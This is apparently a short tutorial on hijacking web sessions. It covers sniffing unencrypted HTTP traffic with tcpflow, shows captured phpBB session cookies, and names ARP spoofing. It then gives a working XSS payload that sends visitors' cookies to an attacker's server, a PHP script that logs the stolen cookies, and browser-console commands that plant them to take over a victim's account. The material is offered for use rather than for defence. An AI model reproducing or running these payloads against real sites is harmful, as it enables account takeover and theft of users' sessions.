If a user is communicating with a site on a webserver via HTTP the website will give him a Session-ID. The user will have to provide this Session-ID on every HTTP request to the webserver to get access to his session. The Session-ID can be provided for example via HTTP-Cookie or HTTP-Parameter. The aim is now to get the Session-ID of a user to be able to access his session on the website aswell.
There are plenty of possibilities for that, but I will just show two for now.
1. Sniffing
The first one is Sniffing. If the communication isn’t using HTTPS and you are in the same network as the user you can use a sniffer like ngrep, tcpflow and tshark to find out the Session-ID. If you are in a WiFi network you can easily sniff everything, but if you are in an ethernet network it depends on the hardware. With a hub you won’t have any problems cause it repeats everything to everyone, but way more common is a switch and to receive also the network communication from the other clients you need to do something like ARP-Spoofing. By the way, if you can capture the username and the password during his login you don’t even need to hijack his session and can login whenever you want by your own.
$ tcpflow -p -c -i wlan0 port 80
Host: forum.##########.de User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://forum.##########.de/phpbb/index.php?sid=8c794c37541148f277bfda0cdec72db9 Cookie: style_cookie=null; phpbb3_9bj3r_u=69438; phpbb3_9bj3r_k=01dc8e7231a7ed58; phpbb3_9bj3r_sid=8c794c37541148f277bfda0cdec72db9 Connection: keep-alive
2. XSS
The second one is XSS (Cross-Site-Scripting). Even if HTTPS is used for the communication you can still use XSS, by implanting Javascript on the website for example via the comment section. If a user is requesting the website the embedded Javascript brings him to execute your external PHP script which saves his Session-ID on your own webserver.
<script type="text/javascript"> document.location="http://mysite.com/getsessionid.php?url="+window.location.href+"&cookie="+document.cookie; </script>
<?php
$session = "URL: "+$_GET['url']+" | Cookie: "+$_GET['cookie'];
$fd = fopen('sessions.txt', 'a');
fwrite($fd, $session);
fclose($fd);
?>
URL: http://forum.##########.de/phpbb/index.php?sid=8c794c37541148f277bfda0cdec72db9 | Cookie: style_cookie=null; phpbb3_9bj3r_u=69438; phpbb3_9bj3r_k=01dc8e7231a7ed58; phpbb3_9bj3r_sid=8c794c37541148f277bfda0cdec72db9
After you have find out the Session-ID (HTTP-Parameter, HTTP-Cookie) you just need to use them to get access to the users session and you can do with it whatever you want. For this task you can use the console of a web browser (like Firefox or Chrome).
document.cookie="phpbb3_9bj3r_u=69438;domain=.forum.##########.de;path=/"; document.cookie="phpbb3_9bj3r_k=01dc8e7231a7ed58;domain=.forum.##########.de;path=/"; document.cookie="phpbb3_9bj3r_sid=8c794c37541148f277bfda0cdec72db9;domain=.forum.##########.de;path=/";